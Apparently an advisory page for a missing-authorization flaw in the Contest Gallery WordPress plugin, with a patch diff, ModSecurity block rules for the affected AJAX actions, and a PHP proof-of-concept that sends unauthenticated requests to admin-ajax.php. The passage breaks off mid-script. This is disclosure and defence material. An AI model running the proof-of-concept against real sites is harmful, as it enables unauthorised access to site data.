+					cg_backend_ajax_error_json('Field assignment types do not match.', 400, 'cg_move_assignment_type_mismatch');
 				}
-				if(!empty($row->WpPageWinner)){
-					wp_delete_post($row->WpPageWinner,true);
-				}
-				if(!empty($row->WpPageEcommerce)){
-					wp_delete_post($row->WpPageEcommerce,true);
+				if (!empty($usedTargetFields[$ToInput])) {
+					cg_backend_ajax_error_json('A target field can only be assigned once.', 400, 'cg_move_assignment_duplicate_target');
 				}

-                // Update parents
-				$optionsInGalleryToMove = $wpdb->get_row("SELECT * FROM $tablename_options WHERE id = $InGalleryIDtoMove ORDER BY id DESC LIMIT 0, 1");
+				$MoveAssigns[$FromInput] = $ToInput;
+				$usedTargetFields[$ToInput] = true;
+			}
+		}

-				if(!empty($optionsInGalleryToMove->WpPageParent)) {
-					$post_title = substr($row->NamePic,0,100);
-					cg_create_wp_pages($InGalleryIDtoMove,$insert_id,$post_title,$optionsInGalleryToMove,$optionsInGalleryToMove->Version);
-				}
+		$insert_id = cg_copy_table_row('contest_gal1ery',$cgMoveRealId, $valueCollect = [], $cgCopyType = '');
+		if (empty($insert_id)) {
+			cg_backend_ajax_error_json('Entry could not be copied to the target gallery.', 500, 'cg_move_copy_failed');
+		}

-				if(!empty($cgMoveCategory)){
-					$wpdb->query("UPDATE $tablename SET Category=$cgMoveCategory WHERE id = $insert_id");
-				}else{
-					$wpdb->query("UPDATE $tablename SET Category=0 WHERE id = $insert_id");
-				}
+		$Version = cg_get_version_for_scripts();

-				$wpdb->query("UPDATE $tablename_ip SET pid=$insert_id, GalleryID = $InGalleryIDtoMove WHERE pid=$cgMoveRealId");
-				$wpdb->query("UPDATE $tablename_comments SET pid=$insert_id, GalleryID = $InGalleryIDtoMove WHERE pid=$cgMoveRealId");
-				$wpdb->query("UPDATE $tablename_entries SET pid=$insert_id, GalleryID = $InGalleryIDtoMove WHERE pid=$cgMoveRealId");
-
-				$input_ids_entries_to_delete = $wpdb->get_results("SELECT id, f_input_id FROM $tablename_entries WHERE pid  = $insert_id");
-				$input_ids_entries_to_delete_array = [];
-                foreach ($input_ids_entries_to_delete as $entry){
-	                $input_ids_entries_to_delete_array[$entry->f_input_id] = $entry->id;
-                }
+		$updated = $wpdb->update(
+			"$tablename",
+			array('Version' => $Version,'GalleryID' => $InGalleryIDtoMove),
+			array('id' => $insert_id),
+			array('%s','%d'),
+			array('%d')
+		);
+
+		if ($updated === false) {
+			$wpdb->delete($tablename, array('id' => $insert_id), array('%d'));
+			cg_backend_ajax_error_json('Copied entry could not be assigned to the target gallery.', 500, 'cg_move_assign_gallery_failed');
+		}

-                if(!empty($MoveAssigns)){// have to be checked with not empty
-                    // now change the input ids if were assigned
-	                foreach ($MoveAssigns as $FromInput => $ToInput){
-		                $FromInput = absint($FromInput);
-		                $ToInput = absint($ToInput);
-		                $wpdb->query("UPDATE $tablename_entries SET f_input_id = $ToInput WHERE pid = $insert_id && f_input_id = $FromInput");
-                        if(isset($input_ids_entries_to_delete_array[$FromInput])){
-	                        unset($input_ids_entries_to_delete_array[$FromInput]);
-                        }
-	                }
-                }
+		$row = $wpdb->get_row($wpdb->prepare("SELECT * FROM $tablename WHERE id = %d", $insert_id));
+		if (empty($row)) {
+			cg_backend_ajax_error_json('Moved entry could not be loaded.', 500, 'cg_move_row_missing');
+		}

-				foreach ($input_ids_entries_to_delete_array as $f_input_id => $entryId) {
-					$wpdb->query("DELETE FROM $tablename_entries WHERE id = $entryId");
-                }
+		$wpdb->delete($tablename, array('id' => $cgMoveRealId, 'GalleryID' => $MoveFromGalleryID), array('%d','%d'));

-				$wp_upload_dir = wp_upload_dir();
-                // unlink activated entries if exists
-				if(file_exists($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-data/image-data-".$cgMoveRealId.".json")){
-					unlink($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-data/image-data-".$cgMoveRealId.".json");
-				}
-				if(file_exists($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-info/image-info-".$cgMoveRealId.".json")){
-					unlink($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-info/image-info-".$cgMoveRealId.".json");
-				}
-                // move file
-				if(file_exists($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-comments/image-comments-".$cgMoveRealId.".json")){
-                    if(!is_dir($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$InGalleryIDtoMove."/json/image-comments")){
-	                    mkdir($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$InGalleryIDtoMove."/json/image-comments",0755,true);
-                    }
-					rename($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-comments/image-comments-".$cgMoveRealId.".json", $wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$InGalleryIDtoMove."/json/image-comments/image-comments-".$insert_id.".json");
-				}
-                // move folder
-				if(is_dir($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-comments/ids/".$cgMoveRealId)){
-					if(!is_dir($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$InGalleryIDtoMove."/json/image-comments/ids")){
-						mkdir($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$InGalleryIDtoMove."/json/image-comments/ids",0755,true);
-                    }
-					rename($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-comments/ids/".$cgMoveRealId, $wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$InGalleryIDtoMove."/json/image-comments/ids/".$insert_id);
-				}
+		// delete WpPages now
+		if(!empty($row->WpPage)){
+			wp_delete_post($row->WpPage,true);
+		}
+		if(!empty($row->WpPageUser)){
+			wp_delete_post($row->WpPageUser,true);
+		}
+		if(!empty($row->WpPageNoVoting)){
+			wp_delete_post($row->WpPageNoVoting,true);
+		}
+		if(!empty($row->WpPageWinner)){
+			wp_delete_post($row->WpPageWinner,true);
+		}
+		if(!empty($row->WpPageEcommerce)){
+			wp_delete_post($row->WpPageEcommerce,true);
+		}

-				cg_json_upload_form_info_data_files_new($InGalleryIDtoMove,[$insert_id],true);
+		// Update parents
+		if(!empty($optionsInGalleryToMove->WpPageParent)) {
+			$post_title = substr($row->NamePic,0,100);
+			cg_create_wp_pages($InGalleryIDtoMove,$insert_id,$post_title,$optionsInGalleryToMove,$optionsInGalleryToMove->Version);
+		}

-                if($row->Active==1){
-	                $collect = "$tablename.id = ".$row->id;
-	                $GalleryID = $row->GalleryID;
-	                $row = $wpdb->get_row( "SELECT DISTINCT $table_posts.*, $tablename.* FROM $table_posts, $tablename WHERE
-                                              (($collect) AND $tablename.GalleryID='$GalleryID' AND $tablename.Active='1' and $table_posts.ID = $tablename.WpUpload)
-                                              OR
-                                              (($collect) AND $tablename.GalleryID='$GalleryID' AND $tablename.Active='1' AND $tablename.WpUpload = 0)
-                                          GROUP BY $tablename.id  ORDER BY $tablename.id DESC LIMIT 0, 1");
-	                cg_create_json_files_when_activating($InGalleryIDtoMove,$row);
-                }
+		$wpdb->update($tablename, array('Category' => $cgMoveCategory), array('id' => $insert_id), array('%d'), array('%d'));

-				die;
+		$wpdb->update($tablename_ip, array('pid' => $insert_id, 'GalleryID' => $InGalleryIDtoMove), array('pid' => $cgMoveRealId, 'GalleryID' => $MoveFromGalleryID), array('%d','%d'), array('%d','%d'));
+		$wpdb->update($tablename_comments, array('pid' => $insert_id, 'GalleryID' => $InGalleryIDtoMove), array('pid' => $cgMoveRealId, 'GalleryID' => $MoveFromGalleryID), array('%d','%d'), array('%d','%d'));
+		$wpdb->update($tablename_entries, array('pid' => $insert_id, 'GalleryID' => $InGalleryIDtoMove), array('pid' => $cgMoveRealId, 'GalleryID' => $MoveFromGalleryID), array('%d','%d'), array('%d','%d'));
+
+		$input_ids_entries_to_delete = $wpdb->get_results($wpdb->prepare("SELECT id, f_input_id FROM $tablename_entries WHERE pid = %d", $insert_id));
+		$input_ids_entries_to_delete_array = [];
+		foreach ($input_ids_entries_to_delete as $entry){
+			$input_ids_entries_to_delete_array[$entry->f_input_id] = $entry->id;
+		}

-			} else {
-				echo "<div id='cgSaveCategoriesCouldNotBeChanged'><h2>MISSINGRIGHTS<br>post_cg_social_platform_input can be edited only as administrator, editor or author.</h2></div>";
-				exit();
+		if(!empty($MoveAssigns)){
+			foreach ($MoveAssigns as $FromInput => $ToInput){
+				$wpdb->query($wpdb->prepare("UPDATE $tablename_entries SET f_input_id = %d WHERE pid = %d AND f_input_id = %d", $ToInput, $insert_id, $FromInput));
+				if(isset($input_ids_entries_to_delete_array[$FromInput])){
+					unset($input_ids_entries_to_delete_array[$FromInput]);
+				}
 			}
+		}

-			exit();
-		} else {
-			exit();
+		foreach ($input_ids_entries_to_delete_array as $f_input_id => $entryId) {
+			$wpdb->query($wpdb->prepare("DELETE FROM $tablename_entries WHERE id = %d", $entryId));
+		}
+
+		$wp_upload_dir = wp_upload_dir();
+		// unlink activated entries if exists
+		if(file_exists($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-data/image-data-".$cgMoveRealId.".json")){
+			unlink($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-data/image-data-".$cgMoveRealId.".json");
+		}
+		if(file_exists($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-stats/image-stats-".$cgMoveRealId.".json")){
+			unlink($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-stats/image-stats-".$cgMoveRealId.".json");
 		}
+		if(file_exists($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-info/image-info-".$cgMoveRealId.".json")){
+			unlink($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-info/image-info-".$cgMoveRealId.".json");
+		}
+		// move file
+		if(file_exists($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-comments/image-comments-".$cgMoveRealId.".json")){
+			if(!is_dir($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$InGalleryIDtoMove."/json/image-comments")){
+				mkdir($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$InGalleryIDtoMove."/json/image-comments",0755,true);
+			}
+			rename($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-comments/image-comments-".$cgMoveRealId.".json", $wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$InGalleryIDtoMove."/json/image-comments/image-comments-".$insert_id.".json");
+		}
+		// move folder
+		if(is_dir($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-comments/ids/".$cgMoveRealId)){
+			if(!is_dir($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$InGalleryIDtoMove."/json/image-comments/ids")){
+				mkdir($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$InGalleryIDtoMove."/json/image-comments/ids",0755,true);
+			}
+			rename($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-comments/ids/".$cgMoveRealId, $wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$InGalleryIDtoMove."/json/image-comments/ids/".$insert_id);
+		}
+
+		cg_json_upload_form_info_data_files_new($InGalleryIDtoMove,[$insert_id],true);
+
+		if($row->Active==1){
+			$GalleryID = $row->GalleryID;
+			$rowForJson = $wpdb->get_row($wpdb->prepare(
+				"SELECT DISTINCT $table_posts.*, $tablename.* FROM $table_posts, $tablename WHERE
+				 (($tablename.id = %d) AND $tablename.GalleryID = %d AND $tablename.Active = '1' and $table_posts.ID = $tablename.WpUpload)
+				 OR
+				 (($tablename.id = %d) AND $tablename.GalleryID = %d AND $tablename.Active = '1' AND $tablename.WpUpload = 0)
+				 GROUP BY $tablename.id ORDER BY $tablename.id DESC LIMIT 0, 1",
+				$row->id, $GalleryID, $row->id, $GalleryID
+			));
+			if (!empty($rowForJson)) {
+				cg_create_json_files_when_activating($InGalleryIDtoMove,$rowForJson);
+			}
+		}
+
+		wp_send_json_success(array(
+			'entry_id' => $cgMoveRealId,
+			'new_entry_id' => $insert_id,
+			'target_gallery_id' => $InGalleryIDtoMove
+		));
 	}
 }
 // move to another gallery---- END
@@ -802,15 +921,15 @@

 	            $post_title = substr(cg_pre_process_name_for_url_name($post_title),0,100);

-            $array = [
+	            $array = [
                     'post_title'=> $post_title,
-	            'post_name'=> $post_name,
+                    'post_name'=> $post_name,
                     'guid'=> $guid,
                     'post_type'=>$post_type,
                     'post_content'=>$post_content,
                     'post_mime_type'=>$post_mime_type,
-	            'post_status'=>'publish'
-            ];
+                    'post_status'=>'publish'
+                ];

 	            $postId = wp_insert_post($array);

@@ -860,7 +979,6 @@
 	    global $wp_version;
 	    $sanitize_textarea_field = ($wp_version < 4.7) ? 'sanitize_text_field' : 'sanitize_textarea_field';

-
 	    if (defined('DOING_AJAX') && DOING_AJAX) {

 		    $user = wp_get_current_user();
@@ -986,9 +1104,7 @@
 // youtube add to gallery ---- END

 // sort files
-
 add_action('wp_ajax_post_cg_gallery_sort_files', 'post_cg_gallery_sort_files');
-
 if (!function_exists('post_cg_gallery_sort_files')) {
     function post_cg_gallery_sort_files()
     {
@@ -1033,36 +1149,42 @@
 if (!function_exists('post_cg_attach_to_another_user_select')) {
 	function post_cg_attach_to_another_user_select()
 	{
-		if (defined('DOING_AJAX') && DOING_AJAX) {
-
-			$user = wp_get_current_user();
-
-			if (
-				is_super_admin($user->ID) ||
-				in_array('administrator', (array)$user->roles) ||
-				in_array('editor', (array)$user->roles) ||
-				in_array('author', (array)$user->roles)
-			) {
-				global $wpdb;
-
-				$wpUsers = $wpdb->base_prefix . "users";
-				$selectWPusers = $wpdb->get_results("SELECT ID, user_login, user_email FROM $wpUsers WHERE ID > 0 ORDER BY ID ASC");
-
-                echo "<select id='cgAttachToAnotherUserSelect' name='cgAttachToAnotherUserId' class='cg_no_outline_and_shadow_on_focus'>";
-                    foreach ($selectWPusers as $user){
-                        echo "<option value='$user->ID' data-user_login='$user->user_login' data-user_email='$user->user_email'>$user->user_login - $user->user_email (ID: $user->ID)</option>";
-                    }
-                echo "</select>";
+		cg_backend_ajax_require_access_json();
+		$_POST = cg1l_sanitize_post($_POST);

-			} else {
-				echo "<div ><h2>MISSINGRIGHTS<br>This area can be edited only as administrator, editor or author.</h2></div>";
-				exit();
-			}
+		$GalleryID = (!empty($_POST['GalleryID'])) ? absint($_POST['GalleryID']) : 0;
+		$galleryHash = (!empty($_POST['cgGalleryHash'])) ? $_POST['cgGalleryHash'] : '';
+		$cgUserSearch = (!empty($_POST['cgUserSearch'])) ? sanitize_text_field($_POST['cgUserSearch']) : '';
+
+		cg_backend_ajax_validate_gallery_hash_json($GalleryID, $galleryHash);
+
+		global $wpdb;
+
+		$wpUsers = $wpdb->base_prefix . "users";
+		if (!empty($cgUserSearch)) {
+			$like = '%' . $wpdb->esc_like($cgUserSearch) . '%';
+			$selectWPusers = $wpdb->get_results($wpdb->prepare("SELECT ID, user_login FROM $wpUsers WHERE ID > 0 AND (user_login LIKE %s OR user_email LIKE %s) ORDER BY user_login ASC LIMIT 20", $like, $like));
+		} else {
+			$selectWPusers = $wpdb->get_results("SELECT ID, user_login FROM $wpUsers WHERE ID > 0 ORDER BY ID ASC LIMIT 20");
+		}

-			exit();
+		$html = "<select id='cgAttachToAnotherUserSelect' name='cgAttachToAnotherUserId' class='cg_no_outline_and_shadow_on_focus'>";
+		if (empty($selectWPusers)) {
+			$html .= "<option value='' disabled selected>No users found</option>";
 		} else {
-			exit();
+			$isFirst = true;
+			foreach ($selectWPusers as $user){
+				$selected = ($isFirst) ? ' selected' : '';
+				$html .= "<option value='" . esc_attr($user->ID) . "' data-user_login='" . esc_attr($user->user_login) . "'" . $selected . ">" . esc_html($user->user_login) . " (ID: " . esc_html($user->ID) . ")</option>";
+				$isFirst = false;
+			}
 		}
+		$html .= "</select>";
+
+		wp_send_json_success(array(
+			'html' => $html,
+			'has_results' => (!empty($selectWPusers))
+		));
 	}
 }
 // attach to another user select --- END
@@ -1072,52 +1194,78 @@
 if (!function_exists('post_cg_attach_to_another_user')) {
 	function post_cg_attach_to_another_user()
 	{
-		if (defined('DOING_AJAX') && DOING_AJAX) {
+		cg_backend_ajax_require_access_json();
+		$_POST = cg1l_sanitize_post($_POST);

-			$user = wp_get_current_user();
+		global $wpdb;

-			if (
-				is_super_admin($user->ID) ||
-				in_array('administrator', (array)$user->roles) ||
-				in_array('editor', (array)$user->roles) ||
-				in_array('author', (array)$user->roles)
-			) {
-				global $wpdb;
-
-				$tablename = $wpdb->prefix . "contest_gal1ery";
-				$table_posts = $wpdb->prefix . "posts";
-				#$wpUsers = $wpdb->prefix . "users";
-
-				$WpUserId = absint($_POST['cgAttachToAnotherUserId']);
-				$pid = absint($_POST['cgEntryId']);
-				$GalleryID = absint($_POST['GalleryID']);
-
-				$wpdb->query("UPDATE $tablename SET WpUserId=$WpUserId WHERE id = $pid");
-
-				$Active = $wpdb->get_var( "SELECT Active FROM $tablename WHERE id = $pid");
-
-                if($Active==1){
-	                $row = $wpdb->get_row( "SELECT DISTINCT $table_posts.*, $tablename.* FROM $table_posts, $tablename WHERE
-                          (($tablename.id = $pid) AND $tablename.GalleryID='$GalleryID' AND $tablename.Active='1' and $table_posts.ID = $tablename.WpUpload)
-                          OR
-                          (($tablename.id = $pid) AND $tablename.GalleryID='$GalleryID' AND $tablename.Active='1' AND $tablename.WpUpload = 0)
-                          GROUP BY $tablename.id  ORDER BY $tablename.id DESC LIMIT 0, 1");
-	                cg_create_json_files_when_activating($GalleryID,$row);
-                }
+		$tablename = $wpdb->prefix . "contest_gal1ery";
+		$tablename_options = $wpdb->prefix . "contest_gal1ery_options";
+		$table_posts = $wpdb->prefix . "posts";
+
+		$WpUserId = (isset($_POST['cgAttachToAnotherUserId'])) ? absint($_POST['cgAttachToAnotherUserId']) : 0;
+		$pid = (!empty($_POST['cgEntryId'])) ? absint($_POST['cgEntryId']) : 0;
+		$GalleryID = (!empty($_POST['GalleryID'])) ? absint($_POST['GalleryID']) : 0;
+		$galleryHash = (!empty($_POST['cgGalleryHash'])) ? $_POST['cgGalleryHash'] : '';
+
+		cg_backend_ajax_validate_gallery_hash_json($GalleryID, $galleryHash);
+
+		if (empty($pid) || empty($GalleryID)) {
+			cg_backend_ajax_error_json('Missing user assignment data.', 400, 'cg_missing_attach_data');
+		}

-				#$wpUser = $wpdb->get_row("SELECT user_login, user_email FROM $wpUsers WHERE ID = $WpUserId");
-				//echo "###".$wpUser->user_login." - ".$wpUser->user_email."###";
-				echo "###post_cg_attach_to_another_user successful###";
-
-			} else {
-				echo "<div ><h2>MISSINGRIGHTS<br>This area can be edited only as administrator, editor or author.</h2></div>";
-				exit();
+		$galleryExists = $wpdb->get_var($wpdb->prepare("SELECT COUNT(*) FROM $tablename_options WHERE id = %d", $GalleryID));
+		if (empty($galleryExists)) {
+			cg_backend_ajax_error_json('Gallery does not exist.', 400, 'cg_attach_gallery_missing');
+		}
+
+		$rowToUpdate = $wpdb->get_row($wpdb->prepare("SELECT * FROM $tablename WHERE id = %d AND GalleryID = %d", $pid, $GalleryID));
+		if (empty($rowToUpdate)) {
+			cg_backend_ajax_error_json('Entry does not belong to the selected gallery.', 400, 'cg_attach_entry_gallery_mismatch');
+		}
+
+		$user_login = '';
+		if (!empty($WpUserId)) {
+			$wpUser = get_user_by('id', $WpUserId);
+			if (empty($wpUser)) {
+				cg_backend_ajax_error_json('Selected user does not exist.', 400, 'cg_attach_user_missing');
 			}
+			$user_login = $wpUser->user_login;
+		}

-			exit();
-		} else {
-			exit();
+		$updated = $wpdb->update(
+			$tablename,
+			array('WpUserId' => $WpUserId),
+			array('id' => $pid, 'GalleryID' => $GalleryID),
+			array('%d'),
+			array('%d','%d')
+		);
+
+		if ($updated === false) {
+			cg_backend_ajax_error_json('User assignment could not be saved.', 500, 'cg_attach_update_failed');
 		}
+
+		if($rowToUpdate->Active==1){
+			$row = $wpdb->get_row($wpdb->prepare(
+				"SELECT DISTINCT $table_posts.*, $tablename.* FROM $table_posts, $tablename WHERE
+				  (($tablename.id = %d) AND $tablename.GalleryID = %d AND $tablename.Active = '1' and $table_posts.ID = $tablename.WpUpload)
+				  OR
+				  (($tablename.id = %d) AND $tablename.GalleryID = %d AND $tablename.Active = '1' AND $tablename.WpUpload = 0)
+				  GROUP BY $tablename.id ORDER BY $tablename.id DESC LIMIT 0, 1",
+				$pid, $GalleryID, $pid, $GalleryID
+			));
+			if (!empty($row)) {
+				$row->WpUserId = $WpUserId;
+				cg_create_json_files_when_activating($GalleryID,$row);
+			}
+		}
+
+		wp_send_json_success(array(
+			'entry_id' => $pid,
+			'user_id' => $WpUserId,
+			'user_login' => $user_login,
+			'detached' => empty($WpUserId)
+		));
 	}
 }
 // attach to another user --- END
@@ -1147,11 +1295,11 @@
                     $isTest = true;
                 }

-                if(empty($cg_secret)){// cause without secret an access token will be at least generated, but can not be used for further requests
-                    $accessToken='error' ;
-                }else{
-                    $accessToken = cg_paypal_get_access_token($cg_client,$cg_secret,$isTest);
-                }
+				if(empty($cg_secret)){// cause without secret an access token will be at least generated, but can not be used for further requests
+					$accessToken='error' ;
+				}else{
+					$accessToken = cg_paypal_get_access_token($cg_client,$cg_secret,$isTest);
+				}

                 if($accessToken!='error' && $accessToken!='no-internet'){
                     echo '###cgkeytrue###';
@@ -1266,7 +1414,6 @@

 // AJAX Script für set comment ---- ENDE

-
 // show paypal transaction response

 add_action('wp_ajax_post_cg_show_paypal_api_response', 'post_cg_show_paypal_api_response');
@@ -1313,46 +1460,51 @@
 if(!function_exists('post_cg_set_for_paypal_sell')){
     function post_cg_set_for_paypal_sell() {

-	    // has to be unsanitized because of the url eventually configured by user
-	    $AllUploadsUsedText = contest_gal1ery_htmlentities_and_preg_replace($_POST['cgSellContainer']['AllUploadsUsedText']);
-        $_POST = cg1l_sanitize_post($_POST);
-	    $_POST['cgSellContainer']['AllUploadsUsedText'] = $AllUploadsUsedText;
-
         contest_gal1ery_db_check();
+        cg_backend_ajax_require_access_json();

-        $isBackendCall = true;
-        $isAjaxCall = true;
-
-        $isAjaxCategoriesCall = true;
+        if (empty($_POST['cgSellContainer']) || !is_array($_POST['cgSellContainer'])) {
+            cg_backend_ajax_error_json('Missing sale settings data.', 400, 'cg_missing_sale_data');
+        }

-        global $wp_version;
-        $sanitize_textarea_field = ($wp_version<4.7) ? 'sanitize_text_field' : 'sanitize_textarea_field';
+        $cgSellContainer = $_POST['cgSellContainer'];
+        $GalleryID = (isset($cgSellContainer['GalleryID'])) ? absint($cgSellContainer['GalleryID']) : 0;
+        $realId = (isset($cgSellContainer['realId'])) ? absint($cgSellContainer['realId']) : 0;
+        $saleAction = (isset($cgSellContainer['saleAction'])) ? sanitize_text_field($cgSellContainer['saleAction']) : '';
+        $galleryHash = (isset($_POST['cgGalleryHash'])) ? sanitize_text_field($_POST['cgGalleryHash']) : '';

-        if ( defined( 'DOING_AJAX' ) && DOING_AJAX ) {
+        cg_backend_ajax_validate_gallery_hash_json($GalleryID, $galleryHash);

-            $user = wp_get_current_user();
-
-            if (
-                is_super_admin($user->ID) ||
-                in_array( 'administrator', (array) $user->roles ) ||
-                in_array( 'editor', (array) $user->roles ) ||
-                in_array( 'author', (array) $user->roles )
-            ) {
+        if (empty($realId) || empty($GalleryID) || !in_array($saleAction, array('activate', 'deactivate'), true)) {
+            cg_backend_ajax_error_json('Missing sale settings data.', 400, 'cg_missing_sale_data');
+        }

-                cg_ecommerce_sale_conf();
+        global $wpdb;
+        $tablename = $wpdb->prefix . "contest_gal1ery";
+        $entry = $wpdb->get_row($wpdb->prepare("SELECT id, GalleryID, EcommerceEntry FROM $tablename WHERE id = %d", $realId));

-                die;
+        if (empty($entry)) {
+            cg_backend_ajax_error_json('Sale entry does not exist.', 400, 'cg_sale_entry_missing');
+        }

-            }else{
-                echo "MISSINGRIGHTS - This area can be edited only as administrator, editor or author.";
-                exit();
-            }
+        if (absint($entry->GalleryID) !== $GalleryID) {
+            cg_backend_ajax_error_json('Entry does not belong to the selected gallery.', 400, 'cg_sale_entry_gallery_mismatch');
+        }

-            exit();
+        if ($saleAction === 'deactivate' && empty($entry->EcommerceEntry)) {
+            cg_backend_ajax_error_json('Sale entry is not active.', 400, 'cg_sale_entry_not_active');
         }
-        else {
-            exit();
+
+        // has to be unsanitized because of the url eventually configured by user
+        $AllUploadsUsedText = '';
+        if (isset($_POST['cgSellContainer']['AllUploadsUsedText'])) {
+            $AllUploadsUsedText = contest_gal1ery_htmlentities_and_preg_replace($_POST['cgSellContainer']['AllUploadsUsedText']);
         }
+        $_POST = cg1l_sanitize_post($_POST);
+        $_POST['cgSellContainer']['AllUploadsUsedText'] = $AllUploadsUsedText;
+
+        cg_ecommerce_sale_conf();
+        die;
     }
 }
 // set for paypal sell --- END
@@ -1402,51 +1554,6 @@
     }
 }

-// deactivate paypal sale
-add_action( 'wp_ajax_post_cg_deactivate_ecommerce_sale', 'post_cg_deactivate_ecommerce_sale' );
-if(!function_exists('post_cg_deactivate_ecommerce_sale')){
-    function post_cg_deactivate_ecommerce_sale() {
-
-        $_POST = cg1l_sanitize_post($_POST);
-
-        contest_gal1ery_db_check();
-
-        $isBackendCall = true;
-        $isAjaxCall = true;
-
-        $isAjaxCategoriesCall = true;
-
-        global $wp_version;
-        $sanitize_textarea_field = ($wp_version<4.7) ? 'sanitize_text_field' : 'sanitiz

SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" "id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2026-42657 unauthorized AJAX action attempted',severity:'CRITICAL',tag:'CVE-2026-42657'" 
SecRule ARGS_POST:action "@streq post_cg_move_to_another_gallery_get_inputs" "chain" 
SecRule ARGS_POST:cgMoveFromGalleryID "@rx ^d+$" "t:none"

SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" "id:20261995,phase:2,deny,status:403,chain,msg:'CVE-2026-42657 unauthorized AJAX action attempted',severity:'CRITICAL',tag:'CVE-2026-42657'" 
SecRule ARGS_POST:action "@streq post_cg_get_current_permalinks" "t:none"

SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" "id:20261996,phase:2,deny,status:403,chain,msg:'CVE-2026-42657 unauthorized AJAX action attempted',severity:'CRITICAL',tag:'CVE-2026-42657'" 
SecRule ARGS_POST:action "@streq post_cg_move_to_another_gallery" "chain" 
SecRule ARGS_POST:cgMoveRealId "@rx ^d+$" "t:none"

SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" "id:20261997,phase:2,deny,status:403,chain,msg:'CVE-2026-42657 unauthorized AJAX action attempted',severity:'CRITICAL',tag:'CVE-2026-42657'" 
SecRule ARGS_POST:action "@streq post_cg_create_pdf_preview_backend" "t:none"

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-42657 - Contest Gallery – Upload & Vote Photos, Media, Sell with PayPal & Stripe <= 28.1.7 - Missing Authorization
// This script exploits missing authorization in post_cg_move_to_another_gallery_get_inputs action

$target_url = 'http://example.com'; // CHANGE THIS to the target WordPress site

// Endpoint for WordPress AJAX
$ajax_url = rtrim($target_url, '/') . '/wp-admin/admin-ajax.php';

// Step 1: Exploit post_cg_move_to_another_gallery_get_inputs (no auth required)
echo "[*] Attempting unauthorized access to post_cg_move_to_another_gallery_get_inputs...n";

$data = array(
    'action' => 'post_cg_move_to_another_gallery_get_inputs',
    'cgMoveFromGalleryID' => 1,
    'cgGalleryHash' => '', // Gallery hash validation may be bypassed if not properly enforced
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

if (curl_errno($ch)) {
    echo "[!] cURL error: " . curl_error($ch) . "n";
} else {
    echo "[*] HTTP Response Code: $http_coden";
    echo "[*] Response body (first 500 chars): " . substr($response, 0, 500) . "n";
    
    // Check if we got gallery data back (success)
    if (strpos($response, 'galleryIDs') !== false || strpos($response, 'allCategoriesByGalleryID') !== false) {
        echo "[+] SUCCESS: Unauthorized access granted! Retrieved gallery structure data.n";
    } elseif ($http_code == 403) {
        echo "[-] Access denied (403). The target may be patched or has additional protection.n";
    } else {
        echo "[*] Response received but unclear if access was granted.n";
    }
}

curl_close($ch);

// Step 2: Exploit post_cg_get_current_permalinks (only nonce check, no capability check)
echo "n[*] Attempting unauthorized access to post_cg_get_current_permalinks...n";

$data2 = array(
